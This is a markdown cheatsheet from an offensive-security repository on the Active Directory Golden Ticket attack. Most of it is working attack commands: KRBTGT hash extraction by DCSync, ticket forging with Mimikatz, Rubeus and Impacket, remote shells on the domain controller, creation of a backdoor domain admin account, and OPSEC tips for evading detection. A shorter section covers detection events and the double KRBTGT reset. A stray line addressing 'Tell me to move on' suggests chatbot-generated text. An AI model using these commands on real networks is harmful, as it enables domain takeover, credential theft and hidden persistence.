daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-11-golden-ticket-attack.md (21675B)


      1 ---
      2 title: "Attack #11 β€” Golden Ticket Attack"
      3 description: "The Golden Ticket attack is the most powerful persistence technique in Active Directory. It exploits the fundamental trust model of the Kerberos protocol…"
      4 category: active-directory
      5 subcategory: "Kerberos & Delegation"
      6 tags: ["active-directory", "kerberos", "credential-access", "privilege-escalation", "persistence"]
      7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "Evil-WinRM"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Two/🟠 Attack #11 β€” Golden Ticket Attack.md"
     11 ---
     12 # 🟠 Attack #11 β€” Golden Ticket Attack
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 The Golden Ticket attack is **the most powerful persistence technique in Active Directory**. It exploits the fundamental trust model of the Kerberos protocol β€” every TGT in the entire domain is signed and encrypted using the **KRBTGT account's hash**, and the Domain Controller trusts any TGT bearing a valid KRBTGT signature without further verification. If an attacker obtains the KRBTGT hash, they can **forge entirely fake TGTs for any user, with any group memberships, any privileges, and any ticket lifetime** β€” completely offline, without ever contacting the DC again.
     19 
     20 The resulting forged ticket is cryptographically indistinguishable from a legitimate one because it is signed with the real KRBTGT key. The attacker can impersonate the Domain Administrator, add themselves to any group (including non-existent ones), set ticket lifetimes of 10 years, and authenticate to any service in the domain β€” including after the legitimate admin's password is changed, after the attacker's account is deleted, and even after the attacker's physical access is revoked. The **only way to invalidate a Golden Ticket** is to reset the KRBTGT password **twice** β€” once is insufficient because both the current and previous hash are accepted.
     21 
     22 ### What You Need to Forge a Golden Ticket
     23 
     24 | Parameter | Where to Get It | Notes |
     25 |---|---|---|
     26 | **KRBTGT NT hash** | DCSync, NTDS.dit dump, LSASS on DC | The master key β€” the entire attack depends on this |
     27 | **KRBTGT AES256 key** | Mimikatz `sekurlsa::ekeys` on DC | Preferred β€” stealthier than RC4 |
     28 | **Domain SID** | `whoami /user`, PowerView, `Get-ADDomain` | e.g. `S-1-5-21-...` β€” everything before the last `-` |
     29 | **Domain FQDN** | `$env:USERDNSDOMAIN`, `ipconfig /all` | e.g. `corp.local` |
     30 | **Target username** | Any valid or forged username | Post-Nov 2021 patches require real username |
     31 
     32 ### The Full Attack Flow
     33 
     34 ```
     35 1. Compromise any path to Domain Admin (spraying β†’ lateral movement β†’ priv esc)
     36 2. Extract KRBTGT hash via DCSync or NTDS.dit dump
     37 3. Collect domain SID
     38 4. Forge a Golden Ticket offline (no DC contact needed)
     39 5. Inject into current session (kerberos::ptt / Rubeus ptt)
     40 6. Access any domain resource as the forged user β€” permanently
     41 7. Even if your account is deleted / password changed β†’ ticket still works
     42 8. Persist indefinitely until KRBTGT password is reset TWICE
     43 ```
     44 
     45 ***
     46 
     47 ## βš™οΈ Prerequisites
     48 
     49 | Requirement | Detail |
     50 |---|---|
     51 | **Domain Admin or DC access** | Required to extract the KRBTGT hash β€” this is a post-DA persistence technique |
     52 | **KRBTGT NT hash or AES key** | Obtained via DCSync, NTDS.dit dump, or Mimikatz on DC |
     53 | **Domain SID** | Available from any domain-joined host with low-priv access |
     54 | **Valid domain username** | Post-Nov 2021 Windows updates require the forged username to exist in AD |
     55 
     56 ***
     57 
     58 ## πŸ› οΈ Tools
     59 
     60 | Tool | Platform | Notes |
     61 |---|---|---|
     62 | **Mimikatz** | Windows | `kerberos::golden` β€” original Golden Ticket forge command |
     63 | **Rubeus** | Windows | `golden` subcommand β€” cleaner, supports AES, `/ptt` injection |
     64 | **Impacket β€” ticketer.py** | Linux | Linux-based Golden Ticket forging; outputs `.ccache` file |
     65 | **Impacket β€” secretsdump.py** | Linux | Extract KRBTGT hash via DCSync before forging |
     66 | **CrackMapExec / NetExec** | Linux | `--use-kcache` to authenticate with the forged ticket |
     67 | **Evil-WinRM** | Linux | Accepts `KRB5CCNAME` for Golden Ticket-based shell |
     68 
     69 ***
     70 
     71 ## πŸ’» Full Commands
     72 
     73 ### πŸ”΅ Step 0 β€” Extract KRBTGT Hash (DCSync Method β€” Most Common)
     74 
     75 ```powershell
     76 # ── Mimikatz DCSync β€” pull KRBTGT hash from any domain-joined machine ──────────
     77 # (Requires DA or account with Replication rights)
     78 privilege::debug
     79 lsadump::dcsync /domain:corp.local /user:krbtgt
     80 
     81 # Output will contain:
     82 # Hash NTLM: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d  ← NT hash (RC4)
     83 # aes256_hmac: b65fb27c8e0d7c5f48b16c10b4...   ← AES256 key (preferred)
     84 # aes128_hmac: a1b2c3d4e5f6a7b8c9d0e1f2...     ← AES128 key
     85 
     86 # ── Also pull domain SID while you're at it ───────────────────────────────────
     87 lsadump::dcsync /domain:corp.local /user:Administrator
     88 # Domain SID is embedded in the output: S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX
     89 ```
     90 
     91 ```bash
     92 # ── Linux β€” DCSync via Impacket ────────────────────────────────────────────────
     93 secretsdump.py corp.local/Administrator:'Password1'@DC01.corp.local -just-dc-user krbtgt
     94 
     95 # Using NT hash (PtH)
     96 secretsdump.py corp.local/Administrator@DC01.corp.local \
     97   -hashes :8846f7eaee8fb117ad06bdd830b7586c -just-dc-user krbtgt
     98 
     99 # Extract NTLM hash β€” it's the right side of:
    100 # corp.local\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d:::
    101 #                                                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    102 #                                                           This is your KRBTGT NT hash
    103 ```
    104 
    105 ***
    106 
    107 ### πŸ”΅ Step 0b β€” Get Domain SID
    108 
    109 ```powershell
    110 # Windows β€” multiple methods
    111 whoami /user                              # SID of current user β€” remove last -RID
    112 Get-ADDomain | Select-Object DomainSID
    113 (Get-ADUser -Identity Administrator).SID  # Remove last segment (-500)
    114 
    115 # PowerView
    116 Get-DomainSID
    117 
    118 # Example SID: S-1-5-21-3878595448-1012506728-1948843120
    119 # Domain SID = S-1-5-21-3878595448-1012506728-1948843120
    120 # (just drop the trailing -RID, e.g. -500 for Administrator)
    121 ```
    122 
    123 ```bash
    124 # Linux β€” via lookupsid.py
    125 lookupsid.py corp.local/low_user:'Password1'@DC01.corp.local 0
    126 # Output: [*] Domain SID is: S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX
    127 ```
    128 
    129 ***
    130 
    131 ### πŸ”΄ Mimikatz β€” Forge & Inject Golden Ticket (Windows)
    132 
    133 ```powershell
    134 # ── Standard Golden Ticket β€” impersonate Administrator ────────────────────────
    135 kerberos::golden \
    136   /user:Administrator \
    137   /domain:corp.local \
    138   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    139   /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
    140   /ptt
    141 
    142 # ── Flags explained:
    143 # /user    = username to impersonate (must exist post-Nov 2021 patches)
    144 # /domain  = target domain FQDN
    145 # /sid     = domain SID (not user SID β€” no trailing RID)
    146 # /krbtgt  = KRBTGT NT hash (RC4)
    147 # /ptt     = inject directly into current session (pass-the-ticket)
    148 
    149 # ── Golden Ticket with AES256 (stealthiest β€” no RC4 downgrade in logs) ────────
    150 kerberos::golden \
    151   /user:Administrator \
    152   /domain:corp.local \
    153   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    154   /aes256:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    155   /ptt
    156 
    157 # ── Save to .kirbi file (for later use / transfer to another machine) ─────────
    158 kerberos::golden \
    159   /user:Administrator \
    160   /domain:corp.local \
    161   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    162   /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
    163   /ticket:golden_admin.kirbi
    164 
    165 # Inject saved .kirbi later
    166 kerberos::ptt golden_admin.kirbi
    167 
    168 # ── Forge ticket with extended lifetime (10 years) ───────────────────────────
    169 kerberos::golden \
    170   /user:Administrator \
    171   /domain:corp.local \
    172   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    173   /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
    174   /startoffset:0 /endin:600 /renewmax:10080 \
    175   /ptt
    176 
    177 # ── Forge ticket for a fake/non-existent user (older DCs without Nov 2021 patch)
    178 kerberos::golden \
    179   /user:hax0r_da \
    180   /domain:corp.local \
    181   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    182   /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
    183   /groups:512,513,518,519,520 \
    184   /ptt
    185 # /groups = RID list to embed (512=DA, 513=DU, 518=Schema, 519=EA, 520=GPO)
    186 
    187 # ── Verify injection ──────────────────────────────────────────────────────────
    188 klist
    189 # Should show ticket for Administrator@CORP.LOCAL with long lifetime
    190 
    191 # ── Use the Golden Ticket ─────────────────────────────────────────────────────
    192 dir \\DC01.corp.local\C$
    193 psexec.exe \\DC01.corp.local cmd.exe
    194 ```
    195 
    196 ***
    197 
    198 ### πŸ”΄ Rubeus β€” Forge Golden Ticket (Windows β€” Modern Approach)
    199 
    200 ```powershell
    201 # ── Golden Ticket with RC4 (NT hash) ─────────────────────────────────────────
    202 .\Rubeus.exe golden \
    203   /user:Administrator \
    204   /domain:corp.local \
    205   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    206   /rc4:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
    207   /ptt /nowrap
    208 
    209 # ── Golden Ticket with AES256 (preferred β€” blends with normal Kerberos traffic) ─
    210 .\Rubeus.exe golden \
    211   /user:Administrator \
    212   /domain:corp.local \
    213   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    214   /aes256:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    215   /ptt /nowrap
    216 
    217 # ── Inject and save simultaneously ───────────────────────────────────────────
    218 .\Rubeus.exe golden \
    219   /user:Administrator \
    220   /domain:corp.local \
    221   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    222   /rc4:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
    223   /ptt /outfile:golden_admin.kirbi /nowrap
    224 
    225 # ── Verify ────────────────────────────────────────────────────────────────────
    226 .\Rubeus.exe triage
    227 klist
    228 ```
    229 
    230 ***
    231 
    232 ### πŸ”΄ Impacket β€” ticketer.py (Linux β€” Forge Golden Ticket)
    233 
    234 ```bash
    235 # ── Forge Golden Ticket from Linux using NT hash ──────────────────────────────
    236 ticketer.py -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
    237   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
    238   -domain corp.local \
    239   Administrator
    240 # Output: Administrator.ccache
    241 
    242 # ── Forge using AES256 key (stealthier) ───────────────────────────────────────
    243 ticketer.py -aesKey b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    244   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
    245   -domain corp.local \
    246   Administrator
    247 
    248 # ── Forge with specific extra groups (embed DA + EA group memberships) ────────
    249 ticketer.py -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
    250   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
    251   -domain corp.local \
    252   -extra-sid S-1-5-21-3878595448-1012506728-1948843120-519 \
    253   Administrator
    254 
    255 # ── Set and use the ticket ────────────────────────────────────────────────────
    256 export KRB5CCNAME=Administrator.ccache
    257 
    258 # Verify ticket
    259 klist
    260 
    261 # Access DC as forged DA
    262 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
    263 wmiexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
    264 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local
    265 
    266 # NetExec
    267 nxc smb DC01.corp.local --use-kcache
    268 nxc smb DC01.corp.local --use-kcache -x "whoami /all"
    269 
    270 # Evil-WinRM
    271 evil-winrm -i DC01.corp.local -r corp.local
    272 ```
    273 
    274 ***
    275 
    276 ### πŸ”΄ Cross-Domain Golden Ticket (Enterprise Admin Access)
    277 
    278 ```bash
    279 # ── Include Extra SID for Enterprise Admins (cross-domain forest access) ──────
    280 # Extra SID format: <RootDomainSID>-519 (Enterprise Admins RID = 519)
    281 ticketer.py -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
    282   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
    283   -domain corp.local \
    284   -extra-sid S-1-5-21-ROOT-DOMAIN-SID-519 \
    285   Administrator
    286 
    287 # ── Mimikatz version ──────────────────────────────────────────────────────────
    288 kerberos::golden \
    289   /user:Administrator \
    290   /domain:corp.local \
    291   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    292   /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
    293   /sids:S-1-5-21-ROOT-DOMAIN-SID-519 \
    294   /ptt
    295 # /sids = extra SIDs to embed (Enterprise Admins in root domain)
    296 ```
    297 
    298 ***
    299 
    300 ### πŸ”΄ Post-Golden Ticket β€” Immediate Actions
    301 
    302 ```bash
    303 # ── 1. Dump ALL domain hashes (DCSync with forged DA ticket) ──────────────────
    304 export KRB5CCNAME=Administrator.ccache
    305 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local \
    306   -just-dc-ntlm -outputfile all_domain_hashes
    307 
    308 # ── 2. Create a persistent backdoor domain admin account ─────────────────────
    309 nxc smb DC01.corp.local --use-kcache \
    310   -x "net user backdoor P@ssword123! /add /domain && net group 'Domain Admins' backdoor /add /domain"
    311 
    312 # ── 3. Give own account DCSync rights (ACL persistence β€” Attack #65) ─────────
    313 # Add Replication-Get-Changes-All to low_user via PowerView
    314 Import-Module .\PowerView.ps1
    315 Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" \
    316   -PrincipalIdentity low_user \
    317   -Rights DCSync -Verbose
    318 
    319 # ── 4. Add KRBTGT hash to your notes β€” it's your persistent master key ────────
    320 # Even if DA password changes, KRBTGT hash = permanent domain access
    321 # Until KRBTGT password reset TWICE
    322 ```
    323 
    324 ***
    325 
    326 ## 🎯 OPSEC Tips
    327 
    328 - **Use AES256 over RC4** β€” RC4-encrypted Golden Tickets generate `EncryptionType: 0x17` in Event 4769, which stands out in AES-enforced environments; AES256 is `EncryptionType: 0x12` and is completely normal
    329 - **Set realistic ticket lifetimes** β€” a 10-year TGT lifetime is a dead giveaway; set `endin` to 600 minutes (default 10 hours) to blend in
    330 - **Use a real existing username** β€” post-November 2021 patches validate that the username exists in AD; forged tickets with fake usernames will fail on patched DCs
    331 - **Keep the KRBTGT hash stored securely** β€” it is your permanent backdoor key; treat it with the same security as a private key
    332 - **Don't inject Golden Tickets on the DC itself** β€” authentication events from LSASS on a DC are heavily monitored; inject on a workstation and access remotely
    333 - **Request individual TGS tickets** rather than accessing resources broadly β€” targeted service access is harder to correlate than sweeping domain access
    334 
    335 ***
    336 
    337 ## πŸ›‘οΈ Detection β€” Event IDs
    338 
    339 | Event ID | Source | What to Look For |
    340 |---|---|---|
    341 | **4769** | Security Log | TGS requested but **no prior 4768** (TGT request) β€” forged tickets skip the AS-REQ |
    342 | **4769** | Security Log | `EncryptionType: 0x17` (RC4) on a domain enforcing AES |
    343 | **4769** | Security Log | TGS for **non-existent user** (pre-Nov 2021 DCs) β€” `0x6` error code |
    344 | **4770** | Security Log | TGT renewal β€” abnormally long remaining lifetime on renewal |
    345 | **4624** | Security Log | Logon Type 3 with Kerberos from a machine the user has no business being on |
    346 | **4672** | Security Log | Special privileges assigned β€” DA-level access from unexpected host |
    347 | **4728/4732** | Security Log | User added to privileged group shortly before suspicious logon |
    348 
    349 **Primary detection signature:** A valid TGS request (4769) with **no corresponding TGT request (4768) from the same IP** is the definitive Golden Ticket indicator β€” forged TGTs are never presented to the DC as part of an AS-REQ exchange because they were forged offline. Microsoft Defender for Identity (MDI) specifically detects this "TGS without TGT" pattern and raises a high-confidence alert.
    350 
    351 ### Invalidating Golden Tickets
    352 
    353 ```powershell
    354 # ── Reset KRBTGT password TWICE (required to invalidate all forged tickets) ────
    355 # First reset β€” invalidates tickets signed with current hash
    356 Set-ADAccountPassword -Identity krbtgt -NewPassword (ConvertTo-SecureString \
    357   "NewKrbtgtPassword1!" -AsPlainText -Force)
    358 
    359 # Wait 10 hours for replication + ticket expiry, then:
    360 # Second reset β€” invalidates tickets signed with previous hash
    361 Set-ADAccountPassword -Identity krbtgt -NewPassword (ConvertTo-SecureString \
    362   "NewKrbtgtPassword2!" -AsPlainText -Force)
    363 
    364 # ⚠️ WARNING: Both resets must propagate to ALL DCs before the attacker's
    365 # ticket expires β€” otherwise the attacker can immediately forge a new one
    366 # from the compromised but not-yet-propagated new hash
    367 ```
    368 
    369 ***
    370 
    371 ## πŸ”— Attack Chain Context
    372 
    373 ```
    374 [Golden Ticket] ──→ Permanent Domain Ownership
    375          β”‚
    376          β”œβ”€β”€β†’ πŸ”‘ Authenticate as any user to any service β€” indefinitely
    377          β”œβ”€β”€β†’ 🩸 DCSync on demand β€” dump all hashes whenever needed
    378          β”œβ”€β”€β†’ 🌐 Cross-forest access via Extra SID embedding (Attack #69)
    379          β”œβ”€β”€β†’ πŸ‘€ SID History injection β€” embed historical SIDs for legacy access
    380          β”œβ”€β”€β†’ πŸ”’ Survives: password changes, account deletions, DA removals
    381          └──→ πŸ’€ Only defeated by: KRBTGT password reset Γ— 2
    382 ```
    383 
    384 **The persistence chain in practice:** An attacker who achieves Domain Admin, runs DCSync to get the KRBTGT hash, and generates a Golden Ticket has **effectively won permanently**. Even if the blue team detects the initial compromise, changes every account password, and removes the attacker's access β€” the KRBTGT hash doesn't change unless explicitly reset. Most organisations never reset the KRBTGT password during incident response because they don't know it's required, leaving the attacker with indefinite re-entry.
    385 
    386 ***
    387 
    388 > βœ… **Attack #11 β€” Golden Ticket complete.** Tell me to move on when you're ready for **Attack #12 β€” Silver Ticket Attack**.
    389 
    390 Sources
    391  What a Golden Ticket Attack Is and How to Defend Against One https://www.legitsecurity.com/aspm-knowledge-base/golden-ticket-attack
    392  What is a Golden Ticket Attack? - CrowdStrike https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/golden-ticket-attack/
    393  What Is a Golden Ticket Attack and How to Detect It https://www.huntress.com/cybersecurity-101/topic/what-is-golden-ticket-attack
    394  What Is a Golden Ticket Attack? Definition & Prevention https://jumpcloud.com/it-index/what-is-a-golden-ticket-attack
    395  Steal or Forge Kerberos Tickets: Golden Ticket https://attack.mitre.org/techniques/T1558/001/
    396  Understanding the golden ticket attack with Mimikatz https://netwrix.com/company/resources/blog/golden-ticket-attack-mimikatz-detection-defense/
    397  How to Defend Against Golden Ticket Attacks: AD Security 101 https://www.semperis.com/blog/how-to-defend-against-golden-ticket-attacks/
    398  Pass-the-ticket attacks: How to detect and prevent credential theft https://www.manageengine.com/products/eventlog/cyber-security/pass-the-ticket-attack.html
    399  What Is a Golden Ticket Attack? How It Works, Detection and Prevention https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/golden-ticket-attack/
    400  Kerberos Protocol: Security Attacks and Solution https://ieeexplore.ieee.org/document/10777133/
    401  Detecting Abuse of Domain Administrator Privilege Using Windows Event Log https://ieeexplore.ieee.org/document/8631459/
    402  Detecting Forged Kerberos Tickets in an Active Directory Environment https://arxiv.org/ftp/arxiv/papers/2301/2301.00044.pdf
    403  RASP for LSASS: Preventing Mimikatz-Related Attacks https://arxiv.org/pdf/2401.00316.pdf
    404  Ransomware: Analysing the Impact on Windows Active Directory Domain
    405   Services https://arxiv.org/pdf/2202.03276.pdf
    406  HADES: Detecting Active Directory Attacks via Whole Network Provenance
    407   Analytics http://arxiv.org/pdf/2407.18858.pdf
    408  Catch Me if You Can: Effective Honeypot Placement in Dynamic AD Attack
    409   Graphs https://arxiv.org/pdf/2312.16820.pdf
    410  Ransomware: Analysing the Impact on Windows Active Directory Domain Services https://www.mdpi.com/1424-8220/22/3/953/pdf
    411  The Reversing Machine: Reconstructing Memory Assumptions https://arxiv.org/pdf/2405.00298.pdf
    412  Can LLMs Hack Enterprise Networks? Autonomous Assumed Breach
    413   Penetration-Testing Active Directory Networks https://arxiv.org/pdf/2502.04227.pdf
    414  Detecting and mitigating Active Directory compromises https://www.cyber.gov.au/business-government/detecting-responding-to-threats/detecting-and-mitigating-active-directory-compromises
    415  Detection Mechanism https://www.manageengine.com/log-management/cyber-security/golden-ticket-attack.html
    416  Detecting and Preventing the Path to a Golden Ticket With Cortex XDR https://www.paloaltonetworks.com/blog/security-operations/detecting-and-preventing-the-path-to-a-golden-ticket-with-cortex-xdr/
    417  What is a Golden Ticket Attack? - SentinelOne https://www.sentinelone.com/cybersecurity-101/cybersecurity/golden-ticket-attack/
    418  Breaking the Ticket: A Beginner's Guide to Kerberos Attacks https://owasp.org/www-chapter-bangkok/slides/2025/2025-02-07_Breaking-the-Ticket-A-Beginners-Guide-to-Kerberos-Attacks.pdf
    419  T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md